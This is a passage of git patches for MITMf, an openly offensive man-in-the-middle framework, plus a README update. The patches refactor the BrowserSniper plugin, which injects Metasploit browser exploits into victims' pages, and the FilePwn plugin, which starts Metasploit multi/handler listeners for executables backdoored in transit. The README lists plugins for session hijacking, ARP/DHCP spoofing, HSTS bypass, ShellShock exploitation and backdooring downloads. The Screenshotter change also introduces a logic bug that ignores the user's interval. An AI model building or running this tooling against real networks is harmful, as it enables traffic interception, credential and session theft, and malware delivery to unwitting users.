(vic_ip not in self.sploited_ips): mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits))) - inject_payload = '' + msf = Msf() for exploit in exploits: - jobs = self.msf.call('job.list') #get running jobs - if jobs: - for pid, name in jobs.iteritems(): - info = self.msf.call('job.info', [pid]) - if (exploit in info['name']): - mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit)) - url = info['uripath'] #get the url assigned to the exploit - inject_payload += "".format(self.msfip, msfport, url) - else: - url, port = self._setupExploit(exploit, msfport) - inject_payload += "".format(self.msfip, port, url) + pid = msf.findpid(exploit) + if pid: + mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit)) + url = msf.jobinfo(pid)['uripath'] #get the url assigned to the exploit + inject_payload += "".format(self.msfip, msfport, url) else: url, port = self._setupExploit(exploit, msfport) inject_payload += "".format(self.msfip, port, url) - + self.injectAndPoll(vic_ip, inject_payload) sleep(1) diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 64f977a..2d40f54 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -68,7 +68,7 @@ import multiprocessing from libs.bdfactory import pebin from libs.bdfactory import elfbin from libs.bdfactory import machobin -from core.msfrpc import Msfrpc +from core.msfrpc import Msf from core.utils import shutdown from plugins.plugin import Plugin from tempfile import mkstemp @@ -126,26 +126,15 @@ class FilePwn(Plugin): self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist'] - #Metasploit options - msfcfg = self.config['MITMf']['Metasploit'] - rpcip = msfcfg['rpcip'] - rpcpass = msfcfg['rpcpass'] + msfversion = Msf().version() + self.tree_info.append("Connected to Metasploit v{}".format(msfversion)) - try: - msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary - msf.login('msf', rpcpass) - version = msf.call('core.version')['version'] - self.tree_info.append("Connected to Metasploit v{}".format(version)) - - t = threading.Thread(name='setupMSF', target=self.setupMSF, args=(msf,)) - t.setDaemon(True) - t.start() - except Exception: - shutdown("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + t = threading.Thread(name='setupMSF', target=self.setupMSF) + t.setDaemon(True) + t.start() - def setupMSF(self, msf): - - jobs = msf.call('job.list') + def setupMSF(self): + msf = Msf() for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: cmd = "use exploit/multi/handler\n" cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) @@ -154,21 +143,16 @@ class FilePwn(Plugin): cmd += "set ExitOnSession False\n" cmd += "exploit -j\n" - if jobs: - for pid, name in jobs.iteritems(): - info = msf.call('job.info', [pid]) - if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) + pid = msf.findpid('multi/handler') + if pid: + info = msf.jobinfo(pid) + if (info['datastore']['payload'] == config["MSFPAYLOAD"]) and (info['datastore']['LPORT'] == config["PORT"]) and (info['datastore']['lhost'] != config['HOST']): + msf.killjob(pid) + msf.sendcommand(cmd) + else: + msf.sendcommand(cmd) else: - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) + msf.sendcommand(cmd) def onConfigChange(self): self.initialize(self.options) diff --git a/plugins/Screenshotter.py b/plugins/Screenshotter.py index 5e32555..eae51ee 100644 --- a/plugins/Screenshotter.py +++ b/plugins/Screenshotter.py @@ -37,7 +37,7 @@ class ScreenShotter(Inject, Plugin): has_opts = True def initialize(self, options): - self.interval = options.interval + self.interval = 10 or options.interval Inject.initialize(self, options) self.html_payload = self.get_payload() @@ -60,4 +60,4 @@ class ScreenShotter(Inject, Plugin): return '' def pluginOptions(self, options): - options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=10, help="Interval at which screenshots will be taken (default 10 seconds)") \ No newline at end of file + options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=None, help="Interval at which screenshots will be taken (default 10 seconds)") \ No newline at end of file From 946ba0b365eddff81fdc1b8828b3545ef68eb782 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 19 May 2015 00:08:44 +0200 Subject: [PATCH 20/20] updated readme --- README.md | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 1008bb1..7b03c09 100644 --- a/README.md +++ b/README.md @@ -16,12 +16,13 @@ Contact me at: Available plugins ================= +- ```Screenshotter``` - Uses HTML5 Canvas to render an accurate screenshot of a clients browser - ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner - ```SSLstrip+``` - Partially bypass HSTS - ```Spoof``` - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing - ```BeEFAutorun``` - Autoruns BeEF modules based on clients OS or browser type - ```AppCachePoison``` - Perform App cache poisoning attacks -- ```Ferret-NG``` - Transparently hijacks sessions +- ```Ferret-NG``` - Tranperently hijacks sessions - ```BrowserProfiler``` - Attempts to enumerate all browser plugins of connected clients - ```CacheKill``` - Kills page caching by modifying headers - ```FilePwn``` - Backdoor executables being sent over HTTP using the Backdoor Factory and BDFProxy @@ -35,6 +36,10 @@ Available plugins Changelog ========= +- ```SessionHijacker``` is replaced with ```Ferret-NG```, captures cookies and starts a proxy that will feed them to connected clients + +- Addition of the ```Screenshotter``` plugin, able to render screenshots of a clients browser at regular intervals + - Addition of a fully functional SMB server using the [Impacket](https://github.com/CoreSecurity/impacket) library - Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now a IPv4/IPv6 (TCP & UDP) DNS server ! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG' @@ -46,8 +51,6 @@ Changelog - Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014 -- Addition of the ```Ferret-NG``` plugin, which uses code from [FireLamb](https://github.com/sensepost/mana/tree/master/firelamb) to store cookies in a Firefox profile - - ```Spoof``` plugin can now exploit the 'ShellShock' bug when DHCP spoofing! - ```Spoof``` plugin now supports ICMP, ARP and DHCP spoofing